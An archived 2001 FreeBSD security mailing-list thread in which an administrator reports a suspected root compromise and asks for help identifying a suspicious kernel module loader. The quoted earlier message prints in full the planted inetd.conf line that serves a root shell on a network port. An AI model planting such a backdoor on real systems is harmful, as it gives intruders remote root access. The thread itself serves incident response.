From owner-freebsd-security Thu Nov 1 7:23:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id 4B3CC37B407 for ; Thu, 1 Nov 2001 07:23:45 -0800 (PST) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.11.4/8.11.3) with ESMTP id fA1FNjW88208 for ; Thu, 1 Nov 2001 10:23:45 -0500 (EST) Date: Thu, 1 Nov 2001 10:23:45 -0500 (EST) From: Ralph Huntington To: Subject: Re: strange inetd.conf entry In-Reply-To: <20011101093558.W79615-100000@mohegan.mohawk.net> Message-ID: <20011101101825.U79615-100000@mohegan.mohawk.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I did find this kernel module, but I have no idea what it is. I presume at this point that the root shell acquired through inetd was for the purpose of loading this module. Anyone recognize it? Anyone want it for analysis? hogan@klink:/etc# ll /usr/bin/joy -r-xr-xr-x 1 root wheel 100 Jul 4 12:05 /usr/bin/joy hogan@klink:/etc# cat /usr/bin/joy #!/bin/sh # $FreeBSD: src/sys/modules/joy/joy.sh,v 1.5 1999/08/28 00:47:23 peter Exp $ kldload joy hogan@klink:/etc# ll /modules/joy.ko -r-xr-xr-x 1 root wheel 6755 Jul 4 12:05 /modules/joy.ko On Thu, 1 Nov 2001, Ralph Huntington wrote: > I have that sinking feeling. I discovered this line at the end of > inetd.conf on one of our servers: > > dlip stream tcp nowait root /bin/sh sh -i > > Looks like a root compromise. Sure enough, telnet'ing to the dlip port > provides what *looks* like a root shell, but I don't seem to be able to do > anything with it. Pretty mysterious. > > Can anyone offer a clue? Thanks in advance, Ralph > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message